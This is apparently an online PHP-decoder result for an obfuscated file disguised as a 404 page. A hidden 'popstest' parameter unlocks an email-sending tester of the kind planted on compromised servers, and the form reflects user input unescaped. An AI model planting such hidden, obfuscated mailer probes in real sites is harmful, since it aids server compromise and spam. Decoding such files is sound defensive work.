Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ${"G\x4c\x4f\x42\x41\x4c\x53"}["su\x63\x72\x7a\x79d\x79\x6e\x63\x6de"] = "p\x6..

Decoded Output download

<head>
  <title>Email sending tester</title>
</head>
<body><b><color>Email sending tester</color></b><br>Write your email and click on send email test<br>
<form method="post">
<input type="email" name="email" style="background-color:whitesmoke;border:1px solid #FFF;outline:none;" required="" placeholder="[email protected]" value="None">
<input type="submit" name="send" value="Send Email Test" style="border:none;background-color: #65d05e;color:#fff;cursor:pointer;">
</form>
<br>
</body><html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>

Did this file decode correctly?

Original Code

<?php
${"G\x4c\x4f\x42\x41\x4c\x53"}["su\x63\x72\x7a\x79d\x79\x6e\x63\x6de"] =
    "p\x61s\x73";
${"\x47\x4c\x4f\x42\x41\x4cS"}["\x69\x64\x6d\x66i\x75t\x75\x6c\x63h\x64"] =
    "b\x64fj\x6d\x6fA\x43\x45\x49JP\x53Z\x35\x64\x34c\x64c\x39fc\x30\x340\x62";
${"G\x4c\x4f\x42A\x4cS"}["\x6fnus\x64z\x6d\x7arsj"] =
    "\x65\x66\x70q\x73u\x77\x7a\x42\x48\x49\x4b\x4d\x4e\x4fW\x5a\x35\x64\x34cd\x63\x39\x66\x63\x30\x336\x32";
${"\x47\x4cO\x42\x41L\x53"}["\x61\x75\x64\x65\x74ci\x73\x6d\x63"] =
    "g\x6akq\x72\x49\x4c\x4e\x53\x35d\x34cd\x639\x66c\x30\x33c\x35";
${"\x47\x4cO\x42\x41L\x53"}["\x64\x71\x75\x7ay\x7a\x76\x67"] =
    "c\x66\x69mw\x79\x41\x46\x50Q\x35\x644c\x64\x63\x39\x66c03\x38\x30";
${"\x47LOB\x41\x4cS"}["\x6f\x63\x6et\x79ku\x71"] = "\x72n\x64";
if (isset($_GET["\x70opst\x65st"])) {
    error_reporting(0);
    echo "\x3c\x68ead\x3e\n  <\x74i\x74le>\x45ma\x69\x6c \x73\x65\x6e\x64i\x6eg \x74est\x65r</t\x69\x74le\x3e\n</h\x65\x61\x64>\n<\x62\x6f\x64y\x3e<\x62\x3e<c\x6f\x6c\x6fr\x3e\x45\x6da\x69l se\x6ed\x69\x6e\x67 tes\x74e\x72\x3c/co\x6co\x72>\x3c/b><br>\x57r\x69t\x65\x20yo\x75\x72\x20em\x61i\x6c \x61\x6ed\x20c\x6c\x69\x63\x6b\x20\x6fn se\x6ed\x20\x65\x6da\x69\x6c test\x3cbr\x3e\n<f\x6fr\x6d\x20m\x65t\x68\x6f\x64\x3d\x22\x70o\x73t\x22\x3e\n<i\x6epu\x74\x20\x74y\x70e\x3d\x22\x65\x6d\x61i\x6c\" nam\x65\x3d\x22em\x61i\x6c\"\x20\x73t\x79\x6ce\x3d\x22\x62a\x63\x6bgr\x6fu\x6ed-co\x6cor:whi\x74e\x73m\x6fke\x3b\x62\x6f\x72\x64\x65\x72:1\x70x\x20so\x6ci\x64 #FF\x46;\x6fu\x74\x6ci\x6ee:\x6e\x6fne\x3b\x22 re\x71\x75i\x72ed\x3d\x22\x22 \x70lace\x68old\x65\x72\x3d\"u\x73\x65\x72\x6eame@gm\x61il\x2ecom\x22\x20\x76\x61\x6cu\x65\x3d\x22" .
        $_POST["\x65ma\x69\x6c"] .
        "\"\x3e\n<\x69\x6e\x70\x75\x74 t\x79\x70\x65\x3d\"s\x75\x62\x6di\x74\x22 name=\x22sen\x64\"\x20v\x61lu\x65\x3d\"\x53\x65nd\x20\x45m\x61il \x54\x65\x73\x74\x22 \x73\x74y\x6c\x65=\"b\x6fr\x64e\x72:\x6eone;back\x67\x72o\x75n\x64-c\x6flo\x72: \x23\x36\x35\x640\x35e\x3b\x63\x6flor:#ff\x66;cu\x72\x73o\x72:p\x6f\x69\x6eter\x3b\x22>\n</\x66\x6fr\x6d\x3e\n\x3c\x62\x72\x3e\n\x3c/\x62o\x64y>";
    if (isset($_POST["\x65ma\x69l"])) {
        $osycgtp = "\x72\x6e\x64";
        ${${"\x47\x4c\x4f\x42\x41LS"}["o\x63\x6e\x74y\x6b\x75\x71"]} = rand();
        mail(
            $_POST["e\x6da\x69\x6c"],
            "\x45\x6d\x61i\x6c Sen\x64\x69ng \x54\x65\x73t R\x65po\x72t\x20I\x44: " .
                ${$osycgtp},
            "W\x4fR\x4b\x49\x4eG\x21"
        );
        print "<f\x6fn\x74\x20c\x6fl\x6fr=or\x61\x6ege\x3e<b>\x45m\x61\x69l S\x65n\x74\x20To: " .
            $_POST["e\x6da\x69\x6c"] .
            ", \x52e\x70o\x72\x74\x20I\x44:\x20" .
            ${${"G\x4c\x4fBA\x4cS"}["\x6f\x63\x6e\x74\x79\x6buq"]} .
            "</b\x3e</\x66\x6fnt\x3e";
    }
}

/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code have been removed, and the file is now safe to use.
* Feel free to contact Imunify support team at https://www.imunify360.com/support/new
*/

echo "\x3c\x68t\x6d\x6c\x3e\x3c\x68e\x61\x64>\n<\x74itle>\x340\x34\x20N\x6ft \x46ound\x3c/\x74\x69\x74le>\n\x3c/hea\x64\x3e\x3c\x62\x6fdy>\n\x3c\x681\x3eN\x6ft \x46\x6fund\x3c/\x681\x3e\n<\x70>Th\x65\x20\x72e\x71u\x65\x73\x74\x65d\x20UR\x4c \x77a\x73 not\x20fo\x75n\x64\x20o\x6e \x74\x68\x69s \x73\x65rver\x2e\x3c/\x70>\n</\x62\x6f\x64\x79>\x3c/\x68t\x6d\x6c>\n";
?>

Function Calls

error_reporting 1

Variables

GLOBALS [{'key': 'sucrzydyncme', 'value': 'pass'}, {'key': 'idmfiutulchd', 'value': 'bdfjmoACEIJPSZ5d4cdc9fc040b'}, {'key': 'onusdzmzrsj', 'value': 'efpqsuwzBHIKMNOWZ5d4cdc9fc0362'}, {'key': 'audetcismc', 'value': 'gjkqrILNS5d4cdc9fc03c5'}, {'key': 'dquzyzvg', 'value': 'cfimwyAFPQ5d4cdc9fc0380'}, {'key': 'ocntykuq', 'value': 'rnd'}]

Stats

MD5 bd6981f20f2474f1091baa9c8d1a047d
Eval Count 0
Decode Time 64 ms